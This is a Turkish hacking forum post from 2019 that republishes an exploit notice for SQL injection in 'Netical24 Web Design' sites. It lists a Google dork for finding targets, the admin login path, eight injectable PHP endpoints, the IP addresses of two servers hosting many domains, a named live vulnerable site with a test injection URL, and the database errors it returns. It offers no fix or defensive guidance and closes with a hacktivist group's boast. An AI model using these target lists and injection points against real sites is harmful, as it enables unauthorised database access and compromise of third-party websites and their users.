Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 4.5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Netical24 Web Design SQL Injection Vulnerability
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,377 / 1,377
Deneyim: 8 / 100
Rep Sayısı: 2785
Mesaj Sayısı: 6381
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Netical24 Web Design SQL Injection Vulnerability
10.01.2019 03:01
######################################################

# Exploit Title : Netical24 Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 10/01/2019
# Vendor Homepage : netical24.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Diseño y Desarrollo Web:Netical24
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

######################################################

# Admin Panel Login Path :
*************************

/admin

# SQL Injection Exploit :
***********************

/ver_noticia.php?id=[SQL Injection]

/ver_documento.php?id=[SQL Injection]

/ver_convenio.php?id=[SQL Injection]

/ver_noticia.php?id=[SQL Injection]

/ver_circular.php?id=[SQL Injection]

/ver_evento.php?id=[SQL Injection]

/ver_convenio.php?id=[SQL Injection]

/formacion.php?t=[SQL Injection]

######################################################

# Example Vulnerable Site :
*************************

Note : (212.18.224.226) => There are 148 domains hosted on this server.

Note : (109.73.169.144) => There are 132 domains hosted on this server.

[+] trabajosocialleon.org/ver_noticia.php?id=93%27 =>

[ Proof of Concept ] => archive.fo/ZnYWd

######################################################

# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near ''' at line 1

You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '' AND
public=1 AND finalizado=0 ORDER BY fecha DESC' at line 1

######################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

######################################################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi